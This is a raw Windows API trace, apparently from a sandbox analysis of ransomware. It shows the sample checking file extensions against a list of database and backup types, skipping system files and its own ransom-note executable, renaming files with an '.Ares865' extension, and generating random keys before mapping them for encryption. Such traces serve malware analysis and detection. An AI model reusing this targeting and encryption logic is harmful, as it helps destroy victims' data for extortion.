(lpString1="H1W", lpString2="4dd") returned 1 [0089.737] lstrlenW (lpString="4dl") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="4dl") returned 1 [0089.737] lstrlenW (lpString="^^^") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="^^^") returned 1 [0089.737] lstrlenW (lpString="abs") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="abs") returned 1 [0089.737] lstrlenW (lpString="abx") returned 3 [0089.737] lstrcmpiW (lpString1="H1W", lpString2="abx") returned 1 [0089.738] lstrlenW (lpString="accdb") returned 5 [0089.738] lstrcmpiW (lpString1="t.H1W", lpString2="accdb") returned 1 [0089.738] lstrlenW (lpString="accdc") returned 5 [0089.738] lstrcmpiW (lpString1="t.H1W", lpString2="accdc") returned 1 [0089.738] lstrlenW (lpString="accde") returned 5 [0089.738] lstrcmpiW (lpString1="t.H1W", lpString2="accde") returned 1 [0089.738] lstrlenW (lpString="accdr") returned 5 [0089.738] lstrcmpiW (lpString1="t.H1W", lpString2="accdr") returned 1 [0089.738] lstrlenW (lpString="accdt") returned 5 [0089.738] lstrcmpiW (lpString1="t.H1W", lpString2="accdt") returned 1 [0089.738] lstrlenW (lpString="accdw") returned 5 [0089.738] lstrcmpiW (lpString1="t.H1W", lpString2="accdw") returned 1 [0089.738] lstrlenW (lpString="accft") returned 5 [0089.738] lstrcmpiW (lpString1="t.H1W", lpString2="accft") returned 1 [0089.738] lstrlenW (lpString="adb") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="adb") returned 1 [0089.738] lstrlenW (lpString="adb") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="adb") returned 1 [0089.738] lstrlenW (lpString="ade") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="ade") returned 1 [0089.738] lstrlenW (lpString="adf") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="adf") returned 1 [0089.738] lstrlenW (lpString="adn") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="adn") returned 1 [0089.738] lstrlenW (lpString="adp") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="adp") returned 1 [0089.738] lstrlenW (lpString="alf") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="alf") returned 1 [0089.738] lstrlenW (lpString="ask") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="ask") returned 1 [0089.738] lstrlenW (lpString="btr") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="btr") returned 1 [0089.738] lstrlenW (lpString="cat") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="cat") returned 1 [0089.738] lstrlenW (lpString="cdb") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="cdb") returned 1 [0089.738] lstrlenW (lpString="ckp") returned 3 [0089.738] lstrcmpiW (lpString1="H1W", lpString2="ckp") returned 1 [0089.738] lstrlenW (lpString="cma") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="cma") returned 1 [0089.739] lstrlenW (lpString="cpd") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="cpd") returned 1 [0089.739] lstrlenW (lpString="dacpac") returned 6 [0089.739] lstrcmpiW (lpString1="et.H1W", lpString2="dacpac") returned 1 [0089.739] lstrlenW (lpString="dad") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dad") returned 1 [0089.739] lstrlenW (lpString="dadiagrams") returned 10 [0089.739] lstrcmpiW (lpString1="estBet.H1W", lpString2="dadiagrams") returned 1 [0089.739] lstrlenW (lpString="daschema") returned 8 [0089.739] lstrcmpiW (lpString1="tBet.H1W", lpString2="daschema") returned 1 [0089.739] lstrlenW (lpString="db-journal") returned 10 [0089.739] lstrcmpiW (lpString1="estBet.H1W", lpString2="db-journal") returned 1 [0089.739] lstrlenW (lpString="db-shm") returned 6 [0089.739] lstrcmpiW (lpString1="et.H1W", lpString2="db-shm") returned 1 [0089.739] lstrlenW (lpString="db-wal") returned 6 [0089.739] lstrcmpiW (lpString1="et.H1W", lpString2="db-wal") returned 1 [0089.739] lstrlenW (lpString="dbc") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dbc") returned 1 [0089.739] lstrlenW (lpString="dbs") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dbs") returned 1 [0089.739] lstrlenW (lpString="dbt") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dbt") returned 1 [0089.739] lstrlenW (lpString="dbv") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dbv") returned 1 [0089.739] lstrlenW (lpString="dbx") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dbx") returned 1 [0089.739] lstrlenW (lpString="dcb") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dcb") returned 1 [0089.739] lstrlenW (lpString="dct") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dct") returned 1 [0089.739] lstrlenW (lpString="dcx") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dcx") returned 1 [0089.739] lstrlenW (lpString="ddl") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="ddl") returned 1 [0089.739] lstrlenW (lpString="dlis") returned 4 [0089.739] lstrcmpiW (lpString1=".H1W", lpString2="dlis") returned -1 [0089.739] lstrlenW (lpString="dp1") returned 3 [0089.739] lstrcmpiW (lpString1="H1W", lpString2="dp1") returned 1 [0089.740] lstrlenW (lpString="dqy") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="dqy") returned 1 [0089.740] lstrlenW (lpString="dsk") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="dsk") returned 1 [0089.740] lstrlenW (lpString="dsn") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="dsn") returned 1 [0089.740] lstrlenW (lpString="dtsx") returned 4 [0089.740] lstrcmpiW (lpString1=".H1W", lpString2="dtsx") returned -1 [0089.740] lstrlenW (lpString="dxl") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="dxl") returned 1 [0089.740] lstrlenW (lpString="eco") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="eco") returned 1 [0089.740] lstrlenW (lpString="ecx") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="ecx") returned 1 [0089.740] lstrlenW (lpString="edb") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="edb") returned 1 [0089.740] lstrlenW (lpString="epim") returned 4 [0089.740] lstrcmpiW (lpString1=".H1W", lpString2="epim") returned -1 [0089.740] lstrlenW (lpString="fcd") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="fcd") returned 1 [0089.740] lstrlenW (lpString="fdb") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="fdb") returned 1 [0089.740] lstrlenW (lpString="fic") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="fic") returned 1 [0089.740] lstrlenW (lpString="flexolibrary") returned 12 [0089.740] lstrcmpiW (lpString1="_BestBet.H1W", lpString2="flexolibrary") returned -1 [0089.740] lstrlenW (lpString="fm5") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="fm5") returned 1 [0089.740] lstrlenW (lpString="fmp") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="fmp") returned 1 [0089.740] lstrlenW (lpString="fmp12") returned 5 [0089.740] lstrcmpiW (lpString1="t.H1W", lpString2="fmp12") returned 1 [0089.740] lstrlenW (lpString="fmpsl") returned 5 [0089.740] lstrcmpiW (lpString1="t.H1W", lpString2="fmpsl") returned 1 [0089.740] lstrlenW (lpString="fol") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="fol") returned 1 [0089.740] lstrlenW (lpString="fp3") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="fp3") returned 1 [0089.740] lstrlenW (lpString="fp4") returned 3 [0089.740] lstrcmpiW (lpString1="H1W", lpString2="fp4") returned 1 [0089.741] lstrlenW (lpString="fp5") returned 3 [0089.741] lstrcmpiW (lpString1="H1W", lpString2="fp5") returned 1 [0089.741] lstrlenW (lpString="fp7") returned 3 [0089.741] lstrcmpiW (lpString1="H1W", lpString2="fp7") returned 1 [0089.741] lstrlenW (lpString="fpt") returned 3 [0089.741] lstrcmpiW (lpString1="H1W", lpString2="fpt") returned 1 [0089.741] lstrlenW (lpString="frm") returned 3 [0089.741] lstrcmpiW (lpString1="H1W", lpString2="frm") returned 1 [0089.741] lstrlenW (lpString="gdb") returned 3 [0089.741] lstrcmpiW (lpString1="H1W", lpString2="gdb") returned 1 [0089.741] lstrlenW (lpString="gdb") returned 3 [0089.741] lstrcmpiW (lpString1="H1W", lpString2="gdb") returned 1 [0089.741] lstrlenW (lpString="grdb") returned 4 [0089.741] lstrcmpiW (lpString1=".H1W", lpString2="grdb") returned -1 [0089.742] lstrlenW (lpString="gwi") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="gwi") returned 1 [0089.742] lstrlenW (lpString="hdb") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="hdb") returned -1 [0089.742] lstrlenW (lpString="his") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="his") returned -1 [0089.742] lstrlenW (lpString="ib") returned 2 [0089.742] lstrcmpiW (lpString1="1W", lpString2="ib") returned -1 [0089.742] lstrlenW (lpString="idb") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="idb") returned -1 [0089.742] lstrlenW (lpString="ihx") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="ihx") returned -1 [0089.742] lstrlenW (lpString="itdb") returned 4 [0089.742] lstrcmpiW (lpString1=".H1W", lpString2="itdb") returned -1 [0089.742] lstrlenW (lpString="itw") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="itw") returned -1 [0089.742] lstrlenW (lpString="jet") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="jet") returned -1 [0089.742] lstrlenW (lpString="jtx") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="jtx") returned -1 [0089.742] lstrlenW (lpString="kdb") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="kdb") returned -1 [0089.742] lstrlenW (lpString="kexi") returned 4 [0089.742] lstrcmpiW (lpString1=".H1W", lpString2="kexi") returned -1 [0089.742] lstrlenW (lpString="kexic") returned 5 [0089.742] lstrcmpiW (lpString1="t.H1W", lpString2="kexic") returned 1 [0089.742] lstrlenW (lpString="kexis") returned 5 [0089.742] lstrcmpiW (lpString1="t.H1W", lpString2="kexis") returned 1 [0089.742] lstrlenW (lpString="lgc") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="lgc") returned -1 [0089.742] lstrlenW (lpString="lwx") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="lwx") returned -1 [0089.742] lstrlenW (lpString="maf") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="maf") returned -1 [0089.742] lstrlenW (lpString="maq") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="maq") returned -1 [0089.742] lstrlenW (lpString="mar") returned 3 [0089.742] lstrcmpiW (lpString1="H1W", lpString2="mar") returned -1 [0089.743] lstrlenW (lpString="marshal") returned 7 [0089.743] lstrcmpiW (lpString1="Bet.H1W", lpString2="marshal") returned -1 [0089.743] lstrlenW (lpString="mas") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="mas") returned -1 [0089.743] lstrlenW (lpString="mav") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="mav") returned -1 [0089.743] lstrlenW (lpString="maw") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="maw") returned -1 [0089.743] lstrlenW (lpString="mdbhtml") returned 7 [0089.743] lstrcmpiW (lpString1="Bet.H1W", lpString2="mdbhtml") returned -1 [0089.743] lstrlenW (lpString="mdn") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="mdn") returned -1 [0089.743] lstrlenW (lpString="mdt") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="mdt") returned -1 [0089.743] lstrlenW (lpString="mfd") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="mfd") returned -1 [0089.743] lstrlenW (lpString="mpd") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="mpd") returned -1 [0089.743] lstrlenW (lpString="mrg") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="mrg") returned -1 [0089.743] lstrlenW (lpString="mud") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="mud") returned -1 [0089.743] lstrlenW (lpString="mwb") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="mwb") returned -1 [0089.743] lstrlenW (lpString="myd") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="myd") returned -1 [0089.743] lstrlenW (lpString="ndf") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="ndf") returned -1 [0089.743] lstrlenW (lpString="nnt") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="nnt") returned -1 [0089.743] lstrlenW (lpString="nrmlib") returned 6 [0089.743] lstrcmpiW (lpString1="et.H1W", lpString2="nrmlib") returned -1 [0089.743] lstrlenW (lpString="ns2") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="ns2") returned -1 [0089.743] lstrlenW (lpString="ns3") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="ns3") returned -1 [0089.743] lstrlenW (lpString="ns4") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="ns4") returned -1 [0089.743] lstrlenW (lpString="nsf") returned 3 [0089.743] lstrcmpiW (lpString1="H1W", lpString2="nsf") returned -1 [0089.744] lstrlenW (lpString="nv") returned 2 [0089.744] lstrcmpiW (lpString1="1W", lpString2="nv") returned -1 [0089.744] lstrlenW (lpString="nv2") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="nv2") returned -1 [0089.744] lstrlenW (lpString="nwdb") returned 4 [0089.744] lstrcmpiW (lpString1=".H1W", lpString2="nwdb") returned -1 [0089.744] lstrlenW (lpString="nyf") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="nyf") returned -1 [0089.744] lstrlenW (lpString="odb") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="odb") returned -1 [0089.744] lstrlenW (lpString="odb") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="odb") returned -1 [0089.744] lstrlenW (lpString="oqy") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="oqy") returned -1 [0089.744] lstrlenW (lpString="ora") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="ora") returned -1 [0089.744] lstrlenW (lpString="orx") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="orx") returned -1 [0089.744] lstrlenW (lpString="owc") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="owc") returned -1 [0089.744] lstrlenW (lpString="p96") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="p96") returned -1 [0089.744] lstrlenW (lpString="p97") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="p97") returned -1 [0089.744] lstrlenW (lpString="pan") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="pan") returned -1 [0089.744] lstrlenW (lpString="pdb") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="pdb") returned -1 [0089.744] lstrlenW (lpString="pdm") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="pdm") returned -1 [0089.744] lstrlenW (lpString="pnz") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="pnz") returned -1 [0089.744] lstrlenW (lpString="qry") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="qry") returned -1 [0089.744] lstrlenW (lpString="qvd") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="qvd") returned -1 [0089.744] lstrlenW (lpString="rbf") returned 3 [0089.744] lstrcmpiW (lpString1="H1W", lpString2="rbf") returned -1 [0089.744] lstrlenW (lpString="rctd") returned 4 [0089.745] lstrcmpiW (lpString1=".H1W", lpString2="rctd") returned -1 [0089.745] lstrlenW (lpString="rod") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="rod") returned -1 [0089.745] lstrlenW (lpString="rodx") returned 4 [0089.745] lstrcmpiW (lpString1=".H1W", lpString2="rodx") returned -1 [0089.745] lstrlenW (lpString="rpd") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="rpd") returned -1 [0089.745] lstrlenW (lpString="rsd") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="rsd") returned -1 [0089.745] lstrlenW (lpString="sas7bdat") returned 8 [0089.745] lstrcmpiW (lpString1="tBet.H1W", lpString2="sas7bdat") returned 1 [0089.745] lstrlenW (lpString="sbf") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="sbf") returned -1 [0089.745] lstrlenW (lpString="scx") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="scx") returned -1 [0089.745] lstrlenW (lpString="sdb") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="sdb") returned -1 [0089.745] lstrlenW (lpString="sdc") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="sdc") returned -1 [0089.745] lstrlenW (lpString="sdf") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="sdf") returned -1 [0089.745] lstrlenW (lpString="sis") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="sis") returned -1 [0089.745] lstrlenW (lpString="spq") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="spq") returned -1 [0089.745] lstrlenW (lpString="te") returned 2 [0089.745] lstrcmpiW (lpString1="1W", lpString2="te") returned -1 [0089.745] lstrlenW (lpString="teacher") returned 7 [0089.745] lstrcmpiW (lpString1="Bet.H1W", lpString2="teacher") returned -1 [0089.745] lstrlenW (lpString="tmd") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="tmd") returned -1 [0089.745] lstrlenW (lpString="tps") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="tps") returned -1 [0089.745] lstrlenW (lpString="trc") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="trc") returned -1 [0089.745] lstrlenW (lpString="trc") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="trc") returned -1 [0089.745] lstrlenW (lpString="trm") returned 3 [0089.745] lstrcmpiW (lpString1="H1W", lpString2="trm") returned -1 [0089.746] lstrlenW (lpString="udb") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="udb") returned -1 [0089.746] lstrlenW (lpString="udl") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="udl") returned -1 [0089.746] lstrlenW (lpString="usr") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="usr") returned -1 [0089.746] lstrlenW (lpString="v12") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="v12") returned -1 [0089.746] lstrlenW (lpString="vis") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="vis") returned -1 [0089.746] lstrlenW (lpString="vpd") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="vpd") returned -1 [0089.746] lstrlenW (lpString="vvv") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="vvv") returned -1 [0089.746] lstrlenW (lpString="wdb") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="wdb") returned -1 [0089.746] lstrlenW (lpString="wmdb") returned 4 [0089.746] lstrcmpiW (lpString1=".H1W", lpString2="wmdb") returned -1 [0089.746] lstrlenW (lpString="wrk") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="wrk") returned -1 [0089.746] lstrlenW (lpString="xdb") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="xdb") returned -1 [0089.746] lstrlenW (lpString="xld") returned 3 [0089.746] lstrcmpiW (lpString1="H1W", lpString2="xld") returned -1 [0089.746] lstrlenW (lpString="xmlff") returned 5 [0089.746] lstrcmpiW (lpString1="t.H1W", lpString2="xmlff") returned -1 [0089.746] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.Ares865") returned 86 [0089.746] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w.ares865"), dwFlags=0x1) returned 1 [0089.784] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W.Ares865" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.784] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206316) returned 1 [0089.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.784] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.785] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.785] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.785] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x328f0, lpName=0x0) returned 0x15c [0089.787] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x328f0) returned 0x420000 [0089.798] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.799] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.799] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.799] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.799] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.799] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.799] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.799] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.799] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0089.801] CloseHandle (hObject=0x15c) returned 1 [0089.801] CloseHandle (hObject=0x118) returned 1 [0089.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.802] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x79f1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help_MTOC_help.H1H", cAlternateFileName="HELP_M~1.H1H")) returned 1 [0089.802] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.802] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="aoldtz.exe") returned 1 [0089.802] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2=".") returned 1 [0089.802] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="..") returned 1 [0089.802] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="windows") returned -1 [0089.802] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="bootmgr") returned 1 [0089.802] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="temp") returned -1 [0089.802] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="pagefile.sys") returned -1 [0089.803] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="boot") returned 1 [0089.803] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="ids.txt") returned -1 [0089.803] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="ntuser.dat") returned -1 [0089.803] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="perflogs") returned -1 [0089.803] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="MSBuild") returned -1 [0089.803] lstrlenW (lpString="Help_MTOC_help.H1H") returned 18 [0089.803] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 78 [0089.803] lstrcpyW (in: lpString1=0x2cce472, lpString2="Help_MTOC_help.H1H" | out: lpString1="Help_MTOC_help.H1H") returned="Help_MTOC_help.H1H" [0089.803] lstrlenW (lpString="Help_MTOC_help.H1H") returned 18 [0089.803] lstrlenW (lpString="Ares865") returned 7 [0089.803] lstrcmpiW (lpString1="elp.H1H", lpString2="Ares865") returned 1 [0089.803] lstrlenW (lpString=".dll") returned 4 [0089.803] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2=".dll") returned 1 [0089.803] lstrlenW (lpString=".lnk") returned 4 [0089.803] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2=".lnk") returned 1 [0089.803] lstrlenW (lpString=".ini") returned 4 [0089.803] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2=".ini") returned 1 [0089.803] lstrlenW (lpString=".sys") returned 4 [0089.803] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2=".sys") returned 1 [0089.803] lstrlenW (lpString="Help_MTOC_help.H1H") returned 18 [0089.803] lstrlenW (lpString="bak") returned 3 [0089.803] lstrcmpiW (lpString1="H1H", lpString2="bak") returned 1 [0089.803] lstrlenW (lpString="ba_") returned 3 [0089.803] lstrcmpiW (lpString1="H1H", lpString2="ba_") returned 1 [0089.803] lstrlenW (lpString="dbb") returned 3 [0089.803] lstrcmpiW (lpString1="H1H", lpString2="dbb") returned 1 [0089.803] lstrlenW (lpString="vmdk") returned 4 [0089.803] lstrcmpiW (lpString1=".H1H", lpString2="vmdk") returned -1 [0089.803] lstrlenW (lpString="rar") returned 3 [0089.803] lstrcmpiW (lpString1="H1H", lpString2="rar") returned -1 [0089.803] lstrlenW (lpString="zip") returned 3 [0089.803] lstrcmpiW (lpString1="H1H", lpString2="zip") returned -1 [0089.803] lstrlenW (lpString="tgz") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="tgz") returned -1 [0089.804] lstrlenW (lpString="vbox") returned 4 [0089.804] lstrcmpiW (lpString1=".H1H", lpString2="vbox") returned -1 [0089.804] lstrlenW (lpString="vdi") returned 3 [0089.804] lstrcmpiW (lpString1="H1H", lpString2="vdi") returned -1 [0089.804] lstrlenW (lpString="vhd") returned 3 